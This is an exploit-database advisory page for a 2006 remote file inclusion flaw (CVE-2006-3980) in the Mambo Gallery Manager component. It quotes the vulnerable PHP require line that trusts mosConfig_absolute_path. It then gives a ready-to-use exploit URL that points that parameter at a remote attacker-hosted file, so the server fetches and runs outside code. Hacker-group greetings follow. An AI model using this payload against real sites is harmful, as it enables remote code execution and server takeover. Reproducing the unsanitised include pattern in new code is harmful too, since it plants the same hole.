[] NeoSense
E X P L O I T S
title author type platform port cve id

Mambo Component MGM 0.95r2 - Remote File Inclusion

Author: A-S-T TEAM
type: webapps
platform: php
port: 
date_added: 2006-07-27 
date_updated:  
verified: 1 
codes: OSVDB-27650;CVE-2006-3980 
tags: 
aliases:  
screenshot_url:  
application_url: 
----------------------------------------------------
Mambo Gallery Manager v095.r3 Remote File Inclusion Vulnerabilities
----------------------------------------------------
Discovered By A-S-T TEAM
WE ARE CrAsH_oVeR_rIdE & BLACK-CODE & MR-HCR
----------------------------------------------------
site of script:http://mamboxchange.com/frs/?group_id=175&release_id=1289
----------------------------------------------------
Vulnerable: Mambo Gallery Manager v095.r3(mgm)
----------------------------------------------------
vulnerable file :
------------------
help.mgm.php
----------------------------------------------------
vulnerable code:
----------------------------------------------------
require $mosConfig_absolute_path .
"/administrator/components/com_mgm/diagnostics.mgm.php";
$mosConfig_absolute_path File inclusion
----------------------------------------------------
Exploit:
http://www.example.com/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://evalcode.txt
----------------------------------------------------------------------------------------------------
Discovered By A-S-T TEAM
Site:www.lezr.com
Greetz:KING-HACKER,YOUNG_HACKER,SIMO64,ROOT-HACKED,SAUDI,QPTAN,POWERWALL,SNIPER_SA,ALMOKAN3,Broken-proxy,troq AND ALL LEZR.COM Member

# milw0rm.com [2006-07-28]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.